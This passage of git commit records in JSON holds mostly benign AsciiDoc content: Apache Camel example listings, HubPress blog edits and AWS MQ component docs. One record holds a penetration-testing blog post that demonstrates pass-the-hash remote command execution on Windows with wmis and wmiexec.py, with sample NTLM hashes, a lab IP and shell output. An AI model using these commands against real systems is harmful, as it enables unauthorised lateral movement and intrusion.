link:camel-example-guice-jms\/README.md[Guice JMS] (camel-example-guice-jms) | Messaging | *deprecated* An example showing how to work with Camel, Guice and JMS\n\n| link:camel-example-jms-file\/README.md[JMS-File] (camel-example-jms-file) | Messaging | An example that persists messages from JMS to files\n\n| link:camel-example-kafka\/README.adoc[Kafka] (camel-example-kafka) | Messaging | An example for Kafka\n\n| link:camel-example-spring-jms\/README.md[Spring JMS] (camel-example-spring-jms) | Messaging | An example using Spring XML to talk to the JMS server from different kind of client techniques\n\n| link:camel-example-box-osgi\/README.md[Box OSGi] (camel-example-box-osgi) | OSGi | An example which use a Box Endpoint in OSGi\n\n| link:camel-example-cdi-osgi\/README.md[CDI OSGi] (camel-example-cdi-osgi) | OSGi | *deprecated* PAX CDI example\n\n| link:camel-example-cxf-blueprint\/README.md[CXF Blueprint] (camel-example-cxf-blueprint) | OSGi | An example which use a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-cxf-osgi\/README.md[CXF OSGi] (camel-example-cxf-osgi) | OSGi | An example which use a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-netty-http\/README.md[Netty HTTP] (camel-example-netty-http) | OSGi | An example showing how to use a shared Netty HTTP server with multiple Camel applications in OSGi container\n\n| link:camel-example-osgi-rmi\/README.md[OSGi RMI] (camel-example-osgi-rmi) | OSGi | *deprecated* A OSGi example which exposes a RMI service.\n\n| link:camel-example-servlet-rest-blueprint\/README.md[Servlet REST Blueprint] (camel-example-servlet-rest-blueprint) | OSGi | An example using Servlet REST with OSGi Blueprint\n\n| link:camel-example-spring-dm\/README.md[Spring DM] (camel-example-spring-dm) | OSGi | *deprecated* A simple OSGi Spring DM example which creates a bundle that can be dropped into any OSGi container\n\n| link:camel-example-sql-blueprint\/README.md[SQL Blueprint] (camel-example-sql-blueprint) | OSGi | An example for showing Camel using SQL component with blueprint\n\n| link:camel-example-ssh\/README.md[SSH] (camel-example-ssh) | OSGi | A simple SSH example which creates a bundle that can be dropped into any OSGi container\n\n| link:camel-example-ssh-security\/README.md[SSH Security] (camel-example-ssh-security) | OSGi | A Certificate secured SSH example that creates a bundle that can be dropped into any OSGi container\n \n\n| link:camel-example-swagger-osgi\/README.md[Swagger OSGi] (camel-example-swagger-osgi) | OSGi | An example using REST DSL in XML and Swagger API\n\n| link:camel-example-groovy\/ReadMe.md[Groovy] (camel-example-groovy) | Other Languages | *deprecated* A Camel route using Groovy DSL\n\n| link:camel-example-kotlin\/ReadMe.md[Kotlin] (camel-example-kotlin) | Other Languages | A Camel route using Kotlin\n\n| link:camel-example-scala\/ReadMe.md[Scala] (camel-example-scala) | Other Languages | *deprecated* A Camel route using Scala\n\n| link:camel-example-java8-rx\/readme.adoc[Java8 RX] (camel-example-java8-rx) | Reactive | An example for showing Camel RX for Java 8\n\n| link:camel-example-reactive-streams\/readme.adoc[Reactive Streams] (camel-example-reactive-streams) | Reactive | An example that shows how Camel can exchange data using reactive streams with Spring Boot reactor\n\n| link:camel-example-cdi-rest-servlet\/README.md[CDI Rest] (camel-example-cdi-rest-servlet) | Rest | REST DSL \/ Servlet with CDI example\n\n| link:camel-example-rest-producer\/readme.adoc[Rest Producer] (camel-example-rest-producer) | Rest | An example showing how to use Camel Rest to call a REST service\n\n| link:camel-example-restlet-jdbc\/README.md[Restlet JDBC] (camel-example-restlet-jdbc) | Rest | An example showing how to create REST API with Camel Restlet and JDBC components\n\n| link:camel-example-spark-rest\/README.md[Spark REST] (camel-example-spark-rest) | Rest | An example using Spark REST\n\n| link:camel-example-spring-boot-rest-swagger\/README.adoc[Spring Boot Rest Swagger] (camel-example-spring-boot-rest-swagger) | Rest | An example showing Camel REST DSL and Swagger with Spring Boot\n\n| link:camel-example-swagger-cdi\/README.md[Swagger CDI] (camel-example-swagger-cdi) | Rest | An example using REST DSL and Swagger Java with CDI\n\n| link:camel-example-swagger-xml\/README.md[Swagger XML] (camel-example-swagger-xml) | Rest | An example using REST DSL in XML and Swagger with Swagger UI (web console)\n\n| link:camel-example-spring-security\/README.md[Spring Security] (camel-example-spring-security) | Security | An example showing how to work with Camel and Spring Security\n\n| link:camel-example-simplejirabot\/README.md[JIRA Bot] (camel-example-simplejirabot) | Social | An example showing how to work with RSS and IRC endpoints\n\n| link:camel-example-twitter-salesforce\/README.md[Twitter Salesforce] (camel-example-twitter-salesforce) | Social | Twitter mentions is created as contacts in Salesforce\n\n| link:camel-example-twitter-websocket\/README.md[Twitter Websocket] (camel-example-twitter-websocket) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-twitter-websocket-blueprint\/README.md[Twitter Websocket Blueprint] (camel-example-twitter-websocket-blueprint) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-cdi-test\/README.md[CDI Test] (camel-example-cdi-test) | Testing | An example illustrating Camel CDI testing features\n\n| link:camel-example-reportincident\/README.md[Report Incident] (camel-example-reportincident) | Tutorial | *deprecated* An example based on real life use case for reporting incidents using webservice that are transformed\n and send as emails to a backing system\n \n\n| link:camel-example-reportincident-wssecurity\/README.md[Report Incident WS-Security] (camel-example-reportincident-wssecurity) | Tutorial | *deprecated* An example based on real life use case for reporting incidents using webservice that are transformed\n and send as emails to a backing system. Client calling the WebService is authentified through WS-Security\n \n\n| link:camel-example-cxf\/README.md[CXF] (camel-example-cxf) | WebService | An example which demonstrates the use of the Camel CXF component\n\n| link:camel-example-cxf-proxy\/README.md[CXF Proxy] (camel-example-cxf-proxy) | WebService | An example which uses Camel to proxy a web service\n\n| link:camel-example-cxf-tomcat\/README.md[CXF Tomcat] (camel-example-cxf-tomcat) | WebService | An example using Camel CXF (code first) with Apache Tomcat\n\n| link:camel-example-spring-ws\/README.md[Spring WebService] (camel-example-spring-ws) | WebService | An example showing how to work with Camel and Spring Web Services\n|=======================================================================\n\/\/ examples: END\n\n\n### Forum, Help, etc\n\nIf you hit an problems please let us know on the Camel Forums <http:\/\/camel.apache.org\/discussion-forums.html>\n\nPlease help us make Apache Camel better - we appreciate any feedback you may\nhave. Enjoy!\n\nThe Camel riders!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67f57d907921daba7f65602a308c40bb5ac2e8b6","subject":"Update 2016-03-18-Blog-Title.adoc","message":"Update 2016-03-18-Blog-Title.adoc","repos":"thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io","old_file":"_posts\/2016-03-18-Blog-Title.adoc","new_file":"_posts\/2016-03-18-Blog-Title.adoc","new_contents":"= Blog Title\n:hp-tags: Data science, GIS, Epi\n\nthis is some text","old_contents":"= Blog Title\n= this is some text","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4be47c6514600bd2a75f7ff6e8e4835960c0aee2","subject":"Update 2016-04-01-First-Post.adoc","message":"Update 2016-04-01-First-Post.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-01-First-Post.adoc","new_file":"_posts\/2016-04-01-First-Post.adoc","new_contents":"= Adoc \u8a18\u6cd5\u30b9\u30cb\u30da\u30c3\u30c8\n\n== h2\n\nhttp:\/\/github.com[Github]\n\nimage::http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg[]\n\n* hoge1\n* hoge2\n** hoge2-1\n\n*bold* +\n_italic_ +\n`monospace` +\n\n\nHOGE:: hoge\u306e\u8aac\u660e\n\n[source, ruby]\n----\ndef hoge\n \/\/ \u307b\u3052\n return if fuga.present?\n \"\u30c6\u30b9\u30c8\"\n %|\u30c6\u30b9\u30c8|\n\t\nend\n----\n\nvideo::KCylB780zSM[youtube]\n\nvideo::67480300[vimeo]\n\n\n.\u30c6\u30fc\u30d6\u30eb\u30bf\u30a4\u30c8\u30eb\n[options=\"header\"]\n|=======================\n|Col 1|Col 2 |Col 3\n|1 |Item 1 |a\n|2 |Item 2 |b\n|3 |Item 3 |c\n|=======================\n\n[format=\"csv\"]\n|======\n1,2,3,4\na,b,c,d\nA,B,C,D\n|======\n\n[quote, 'https:\/\/ja.wikipedia.org\/wiki\/%E8%BB%BD%E9%87%8F%E3%83%9E%E3%83%BC%E3%82%AF%E3%82%A2%E3%83%83%E3%83%97%E8%A8%80%E8%AA%9E[Wikipedia:\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e]']\n____\n\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\uff08\u3051\u3044\u308a\u3087\u3046\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u3052\u3093\u3054\u3001\n\u82f1\u8a9e: lightweight markup language\uff09\u306f\u3001\n\u4eba\u9593\u304c\u30b7\u30f3\u30d7\u30eb\u306a\u30c6\u30ad\u30b9\u30c8\u30a8\u30c7\u30a3\u30bf\u3092\u4f7f\u3063\u3066\u306e\n\u5165\u529b\u304c\u5bb9\u6613\u306b\u306a\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u305f\u3001\n\u7c21\u6f54\u306a\u6587\u6cd5\u3092\u3082\u3064\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\u3067\u3042\u308b\u3002\n____\n\n\n++++\n<ruby>\n <rb>\u4e9c\u7c73\u5229\u52a0<\/rb>\n <rp>\uff08<\/rp>\n <rt> \u30a2\u30e1\u30ea\u30ab<\/rt>\n <rp> \uff09<\/rp>\n<\/ruby>\n++++\n\n\/\/ Meta\u60c5\u5831\n:hp-alt-title: First Post\n:hp-tags: adoc, sandbox, snippet\n:published_at: 2016-04-01\n:hp-image: http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg\n","old_contents":"= Adoc \u8a18\u6cd5\u30b9\u30cb\u30da\u30c3\u30c8\n\n== h2\n\nhttp:\/\/github.com[Github]\n\nimage::http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg[]\n\n* hoge1\n* hoge2\n** hoge2-1\n\n*bold* +\n_italic_ +\n`monospace` +\n\n\nHOGE:: hoge\u306e\u8aac\u660e\n\n[source, ruby]\n----\ndef hoge\n \/\/ \u307b\u3052\n return if fuga.present?\n \"\u30c6\u30b9\u30c8\"\n %|\u30c6\u30b9\u30c8|\n\t\nend\n----\n\n[source, python]\n----\ninclude::test.py[]\n----\n\nvideo::KCylB780zSM[youtube]\n\nvideo::67480300[vimeo]\n\n\n.\u30c6\u30fc\u30d6\u30eb\u30bf\u30a4\u30c8\u30eb\n[options=\"header\"]\n|=======================\n|Col 1|Col 2 |Col 3\n|1 |Item 1 |a\n|2 |Item 2 |b\n|3 |Item 3 |c\n|=======================\n\n[format=\"csv\"]\n|======\n1,2,3,4\na,b,c,d\nA,B,C,D\n|======\n\n[quote, 'https:\/\/ja.wikipedia.org\/wiki\/%E8%BB%BD%E9%87%8F%E3%83%9E%E3%83%BC%E3%82%AF%E3%82%A2%E3%83%83%E3%83%97%E8%A8%80%E8%AA%9E[Wikipedia:\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e]']\n____\n\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\uff08\u3051\u3044\u308a\u3087\u3046\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u3052\u3093\u3054\u3001\n\u82f1\u8a9e: lightweight markup language\uff09\u306f\u3001\n\u4eba\u9593\u304c\u30b7\u30f3\u30d7\u30eb\u306a\u30c6\u30ad\u30b9\u30c8\u30a8\u30c7\u30a3\u30bf\u3092\u4f7f\u3063\u3066\u306e\n\u5165\u529b\u304c\u5bb9\u6613\u306b\u306a\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u305f\u3001\n\u7c21\u6f54\u306a\u6587\u6cd5\u3092\u3082\u3064\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\u3067\u3042\u308b\u3002\n____\n\n\n++++\n<ruby>\n <rb>\u4e9c\u7c73\u5229\u52a0<\/rb>\n <rp>\uff08<\/rp>\n <rt> \u30a2\u30e1\u30ea\u30ab<\/rt>\n <rp> \uff09<\/rp>\n<\/ruby>\n++++\n\n\/\/ Meta\u60c5\u5831\n:hp-alt-title: First Post\n:hp-tags: adoc, sandbox, snippet\n:published_at: 2016-04-01\n:hp-image: http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0172ccaa70685b9211309970bd3f2cb5993935e1","subject":"Deleted _posts\/2016-10-31-First-post.adoc","message":"Deleted _posts\/2016-10-31-First-post.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2016-10-31-First-post.adoc","new_file":"_posts\/2016-10-31-First-post.adoc","new_contents":"","old_contents":"= First post\n:hp-tags: HubPress, Blog, Open Source\n\nThis is my first post using hubpress","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"709efab9cc28d59210fee0de6de2e68f09b9219a","subject":"Update 2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","message":"Update 2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","new_file":"_posts\/2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","new_contents":"= Executing code via SMB \/ DCOM without PSEXEC\n:hp-tags: wmi, wmis, impacket\n\nPSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all \"psexec\" tools work is:\n\n 1. (_Optional_) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal's tool) to the ADMIN$ share\n 2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.\n 3. Run the service\n 4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.\n\nNow, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.\n\nAs you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: [HERE](\/blog\/2013\/06\/10\/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1\/) and [HERE](\/blog\/2013\/10\/06\/dumping-a-domain-worth-of-passwords-with-mimikatz\/)\n\nThe downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn't used to be an available option.\n\nThat has changed with the \"wmis\" package on Kali Linux that incorporates the http:\/\/passing-the-hash.blogspot.com\/2013\/07\/WMIS-PowerSploit-Shells.html[\"Pass-the-Hash for 15 years toolkit\"]\n\n(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)\n\nThe other solution is supplied as an example in the http:\/\/corelabs.coresecurity.com\/index.php?module=Wiki&action=view&type=tool&name=Impacket[Impacket library] https:\/\/code.google.com\/p\/impacket\/source\/browse\/trunk\/examples\/wmiexec.py[\"wmiexec.py\"]. In my experience there are a few features that make it the better option.\n\n1. Installing it on a random VPS is dead simple and doesn't need the Kali repos to get right, nor Debian\/Ubuntu.\n2. It defaults to an \"semi-interactive shell\" which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools\n3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write\/read.\n\nEnough crazy talk here is an example usage of each:\n\n## WMIS\n\n### Usage:\n\n```\nroot@wpad:~# wmis\nUsage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]\n [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]\n [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]\n [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]\n [-U|--user=[DOMAIN\\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]\n [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]\n [--use-security-mechanisms=STRING] [-V|--version]\n \/\/host\n\nExample: wmis -U [domain\/]adminuser%password \/\/host cmd.exe \/c dir c:\\ > c:\\windows\\temp\\output.txt \n```\n\n## Example:\n```\nroot@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 \/\/172.16.102.141 calc.exe\nHASH PASS: Substituting user supplied NTLM HASH...\nHASH PASS: Substituting user supplied NTLM HASH...\n[wmi\/wmis.c:172:main()] 1: calc.exe\nNTSTATUS: NT_STATUS_OK - Success\n```\n\n\n\n## wmiexec.py\n\nUsing a password, but with hashes you just tell it `-hashes` :\n\n### Usage:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py \nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]\n target [command [command ...]]\n\npositional arguments:\n target [domain\/][username[:password]@]<address>\n command command to execute at the target. If empty it will\n launch a semi-interactive shell\n\noptional arguments:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n C$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n\nauthentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n\n```\n### Example:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141\nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nSMBv2.1 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\nC:\\>dir\n Volume in drive C has no label.\n Volume Serial Number is 5CCA-B528\n\n Directory of C:\\\n\n07\/13\/2009 11:20 PM <DIR> PerfLogs\n10\/07\/2013 03:26 PM <DIR> Program Files\n07\/14\/2009 01:08 AM <DIR> Program Files (x86)\n04\/25\/2014 02:21 AM <DIR> Users\n05\/11\/2014 03:39 PM <DIR> Windows\n 0 File(s) 0 bytes\n 5 Dir(s) 52,884,389,888 bytes free\n\nC:\\>\n\n```\n\n","old_contents":"---\nlayout: post\ntitle: \"Executing code via SMB \/ DCOM without PSEXEC\"\ndate: 2014-04-19 21:36:21 -0400\ncomments: true\ncategories:\n- wmi\n- wmis\n- impacket\n---\n\nPSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all \"psexec\" tools work is:\n\n 1. (_Optional_) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal's tool) to the ADMIN$ share\n 2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.\n 3. Run the service\n 4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.\n\nNow, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.\n\nAs you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: [HERE](\/blog\/2013\/06\/10\/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1\/) and [HERE](\/blog\/2013\/10\/06\/dumping-a-domain-worth-of-passwords-with-mimikatz\/)\n\nThe downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn't used to be an available option.\n\nThat has changed with the \"wmis\" package on Kali Linux that incorporates the [\"Pass-the-Hash for 15 years toolkit\"](http:\/\/passing-the-hash.blogspot.com\/2013\/07\/WMIS-PowerSploit-Shells.html)\n\n(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)\n\nThe other solution is supplied as an example in the [Impacket library](http:\/\/corelabs.coresecurity.com\/index.php?module=Wiki&action=view&type=tool&name=Impacket) [\"wmiexec.py\"](https:\/\/code.google.com\/p\/impacket\/source\/browse\/trunk\/examples\/wmiexec.py). In my experience there are a few features that make it the better option.\n\n1. Installing it on a random VPS is dead simple and doesn't need the Kali repos to get right, nor Debian\/Ubuntu.\n2. It defaults to an \"semi-interactive shell\" which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools\n3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write\/read.\n\nEnough crazy talk here is an example usage of each:\n\n## WMIS\n\n### Usage:\n\n```\nroot@wpad:~# wmis\nUsage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]\n [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]\n [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]\n [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]\n [-U|--user=[DOMAIN\\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]\n [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]\n [--use-security-mechanisms=STRING] [-V|--version]\n \/\/host\n\nExample: wmis -U [domain\/]adminuser%password \/\/host cmd.exe \/c dir c:\\ > c:\\windows\\temp\\output.txt \n```\n\n## Example:\n```\nroot@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 \/\/172.16.102.141 calc.exe\nHASH PASS: Substituting user supplied NTLM HASH...\nHASH PASS: Substituting user supplied NTLM HASH...\n[wmi\/wmis.c:172:main()] 1: calc.exe\nNTSTATUS: NT_STATUS_OK - Success\n```\n\n\n\n## wmiexec.py\n\nUsing a password, but with hashes you just tell it `-hashes` :\n\n### Usage:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py \nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]\n target [command [command ...]]\n\npositional arguments:\n target [domain\/][username[:password]@]<address>\n command command to execute at the target. If empty it will\n launch a semi-interactive shell\n\noptional arguments:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n C$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n\nauthentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n\n```\n### Example:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141\nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nSMBv2.1 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\nC:\\>dir\n Volume in drive C has no label.\n Volume Serial Number is 5CCA-B528\n\n Directory of C:\\\n\n07\/13\/2009 11:20 PM <DIR> PerfLogs\n10\/07\/2013 03:26 PM <DIR> Program Files\n07\/14\/2009 01:08 AM <DIR> Program Files (x86)\n04\/25\/2014 02:21 AM <DIR> Users\n05\/11\/2014 03:39 PM <DIR> Windows\n 0 File(s) 0 bytes\n 5 Dir(s) 52,884,389,888 bytes free\n\nC:\\>\n\n```\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"08080a460df72ad28843d4912ab474a6e21a64a9","subject":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","message":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_contents":"= Welcome to Mirum Singapore Agency Showcase\n:published_at: 2015-08-03\n:hp-tags: HubPress, Blog, Open Source\n\n\n\nvideo::48UgQmvq8VA[youtube]\n\n== Small Image\nimage::https:\/\/farm6.staticflickr.com\/5493\/14496162345_872e58358f_m.jpg#small[small]\n== Normal Image\nimage::https:\/\/farm6.staticflickr.com\/5534\/14492781111_042ae8b40d_c.jpg[Normal]\n== Large Image\nimage::https:\/\/farm3.staticflickr.com\/2934\/14050612097_57c8dab90c_b.jpg#large[Large]\n== Full width Image\nimage::https:\/\/farm8.staticflickr.com\/7230\/13836614065_866c50b9d0_k.jpg#full[Full]\n\n\n=== Photo Gallery\nimage::http:\/\/photos-c.ak.instagram.com\/hphotos-ak-xap1\/10299624_651870351533978_698775745_n.jpg[Gallery 1] image::http:\/\/photos-h.ak.instagram.com\/hphotos-ak-xpa1\/10349783_1421830468085423_1781757588_n.jpg[Gallery 2] image::http:\/\/photos-f.ak.instagram.com\/hphotos-ak-xpf1\/10326473_685992338134029_1330967718_n.jpg[Gallery 3] image::http:\/\/photos-g.ak.instagram.com\/hphotos-ak-xpa1\/10349270_623564424403646_1080162466_n.jpg[Gallery 4]","old_contents":"= Welcome to Mirum Singapore Agency Showcase\n:published_at: 2015-08-03\n:hp-tags: HubPress, Blog, Open Source\n\n\n\nvideo::[48UgQmvq8VA][youtube]\n\n== Small Image\nimage::https:\/\/farm6.staticflickr.com\/5493\/14496162345_872e58358f_m.jpg#small[small]\n== Normal Image\nimage::https:\/\/farm6.staticflickr.com\/5534\/14492781111_042ae8b40d_c.jpg[Normal]\n== Large Image\nimage::https:\/\/farm3.staticflickr.com\/2934\/14050612097_57c8dab90c_b.jpg#large[Large]\n== Full width Image\nimage::https:\/\/farm8.staticflickr.com\/7230\/13836614065_866c50b9d0_k.jpg#full[Full]\n\n\n=== Photo Gallery\nimage::http:\/\/photos-c.ak.instagram.com\/hphotos-ak-xap1\/10299624_651870351533978_698775745_n.jpg[Gallery 1] image::http:\/\/photos-h.ak.instagram.com\/hphotos-ak-xpa1\/10349783_1421830468085423_1781757588_n.jpg[Gallery 2] image::http:\/\/photos-f.ak.instagram.com\/hphotos-ak-xpf1\/10326473_685992338134029_1330967718_n.jpg[Gallery 3] image::http:\/\/photos-g.ak.instagram.com\/hphotos-ak-xpa1\/10349270_623564424403646_1080162466_n.jpg[Gallery 4]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"28818fcc83ff7e25e146c5b113127dc091dd1bf4","subject":"CAMEL-14463 - Create an AWS-MQ component based on SDK v2, regen docs","message":"CAMEL-14463 - Create an AWS-MQ component based on SDK v2, regen docs\n","repos":"pax95\/camel,DariusX\/camel,adessaigne\/camel,zregvart\/camel,tdiesler\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,apache\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,christophd\/camel,DariusX\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,alvinkwekel\/camel,mcollovati\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,christophd\/camel,apache\/camel,zregvart\/camel,DariusX\/camel,mcollovati\/camel,christophd\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,pax95\/camel,christophd\/camel,apache\/camel,nikhilvibhav\/camel,ullgren\/camel,nicolaferraro\/camel,mcollovati\/camel,cunningt\/camel,tdiesler\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,alvinkwekel\/camel,tadayosi\/camel,zregvart\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,ullgren\/camel,apache\/camel,ullgren\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,mcollovati\/camel,adessaigne\/camel,adessaigne\/camel,ullgren\/camel,nicolaferraro\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/aws2-mq-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/aws2-mq-component.adoc","new_contents":"[[aws2-mq-component]]\n= AWS 2 MQ Component\n:page-source: components\/camel-aws2-mq\/src\/main\/docs\/aws2-mq-component.adoc\n\n*Since Camel 3.1*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe MQ component supports create, run, start, stop and terminate\nhttps:\/\/aws.amazon.com\/amazon-mq\/[AWS MQ] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon MQ. More information is available at\nhttps:\/\/aws.amazon.com\/amazon-mq\/[Amazon MQ].\n\n[NOTE]\n====\nThe AWS2 MQ component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-mq:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 MQ component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | The AWS MQ default configuration | | MQ2Configuration\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| 